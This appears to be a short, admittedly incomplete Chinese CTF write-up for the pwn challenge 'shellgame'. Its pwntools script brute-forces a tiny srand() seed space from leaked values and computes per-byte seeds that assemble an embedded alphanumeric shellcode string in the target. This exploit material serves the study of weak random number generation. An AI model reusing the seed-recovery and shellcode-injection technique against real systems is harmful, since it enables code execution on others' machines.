题目思路大概是通过给出的10个序列,爆破种子,恢复160个随机数。计算每一步需要加的随机数个数拼凑明文shellcode。
关于后面pid的绕过,crazyman的原话是:“the part about the value of pid can consider using the idea of simulation to obtain pid==1”。
我现在还没完全学会这道题,详细步骤还得等之后来写。
from pwn import *
from ctypes import *

# Local target; the commented remote() line is the author's toggle for the
# live service and is left in place.
io = process('./shellgame')
#io=remote('127.0.0.1',11451)
context.arch = 'amd64'
context.log_level = 'debug'
libc = ELF('./libc.so.6')


# Thin wrappers around the pwntools tube. The names are referenced further
# down the script (e.g. sa in add()), so they are kept unchanged.
def rl(a=False):
    return io.recvline(a)


def ru(a, b=True):
    return io.recvuntil(a, b)


def rn(x):
    return io.recvn(x)


def sn(x):
    return io.send(x)


def sl(x):
    return io.sendline(x)


def sa(a, b):
    return io.sendafter(a, b)


def sla(a, b):
    return io.sendlineafter(a, b)


def irt():
    return io.interactive()


def dbg(text=None):
    return gdb.attach(io, text)


def lg(s):
    # Debug printer: s is evaluated as a Python expression in this module,
    # so it must only ever be a literal variable name written in this script.
    return log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))


def uu32(data):
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    return u64(data.ljust(8, b'\x00'))


# The same libc the target links against, loaded through ctypes so that
# srand()/rand() below reproduce the target's generator bit-for-bit.
clib = cdll.LoadLibrary("./libc.so.6")

# Read the ten leaked values; the trailing element after the split is the
# empty piece left by the newline and is dropped.
ru("Your lucky number is:\n")
line = io.recvline().decode()
data = line.split(' ')[:-1]
# Parse the leaked values. int(tok[2:]) skips a two-character prefix on every
# token (presumably the printed "0x" -- TODO confirm against the binary's
# output format); negative tokens are the signed-char form of the same byte.
src = [int(tok[2:]) for tok in data]
src = [v + 0x100 if v < 0 else v for v in src]

# The seed space is only 0..0x100, so ten observed low bytes of rand() are
# enough to identify it by exhaustive search -- this is the lesson of the
# challenge: srand()/rand() seeded from a tiny range is fully predictable and
# must never be used where unpredictability matters.
# NOTE: if no candidate reproduces all ten bytes, seed silently stays 0 and
# the rest of the script runs on a wrong sequence.
seed = 0
for candidate in range(0x101):
    clib.srand(candidate)
    if all(clib.rand() % 0x100 == src[j] for j in range(10)):
        seed = candidate
        break

# Replay the recovered seed to obtain the first 161 low bytes of rand();
# the first ten coincide with the leaked values.
clib.srand(seed)
src = [clib.rand() % 0x100 for _ in range(161)]
seedlist = []
# Target byte string; a terminating NUL is appended when it is expanded.
shellcode = "W828Rvj8jf9zfYWj3hzZR9HR8ZYTT5ik0ZC839i3TjAiZTCRTiW88Bj0itY4Wfe99YoT08PTbfAf88i038sCWYfstX119TX00ZUtnYDSPZTJTX00TTA0AnmTYAjKT090T4iWjYH80iY1W"

# Hex view of the target bytes for eyeballing, then the integer form that the
# arithmetic below actually uses.
des = [hex(ord(ch)) for ch in shellcode] + [hex(0)]
print(des)
des = [ord(ch) for ch in shellcode] + [0]


def _seed_for(delta):
    """Return the first seed in 0..0x1fff whose first rand() low byte equals delta.

    Returns None when no candidate matches. Either way the generator is left
    in the state after the last srand()/rand() pair, which the caller relies on.
    """
    for cand in range(0x2000):
        clib.srand(cand)
        if clib.rand() % 0x100 == delta:
            return cand
    return None


for i in range(len(shellcode) + 1):
    # Byte that must be added at this position to reach the wanted value.
    delta = (des[i] - src[i]) % 0x100
    found = _seed_for(delta)
    # NOTE: on a miss nothing is appended, and the two rand() draws below run
    # on the last candidate's state, so later positions silently desync.
    if found is not None:
        seedlist.append(found)
    # The next two draws are folded into the following two slots -- presumably
    # mirroring how the target consumes rand() after each step; confirm against
    # the binary.
    src[i + 1] = (src[i + 1] + clib.rand() % 0x100) % 0x100
    src[i + 2] = (src[i + 2] + clib.rand() % 0x100) % 0x100
print(seedlist)
def add(idx, seed):
    """Send one seed to the target at position idx.

    Presumably menu option 1 followed by the position; the second payload is
    deliberately a str (pwntools encodes it), kept as the author wrote it.
    """
    sa(b'> ', b'1'.ljust(0x10, b'\x00') + p32(seed))
    sa(b'> ', str(idx).ljust(0x14, '\x00'))


# Positions are 1-based on the target side.
for idx, s in enumerate(seedlist, 1):
    add(idx, s)
io.send(b'4'.ljust(0x14, b'\x00'))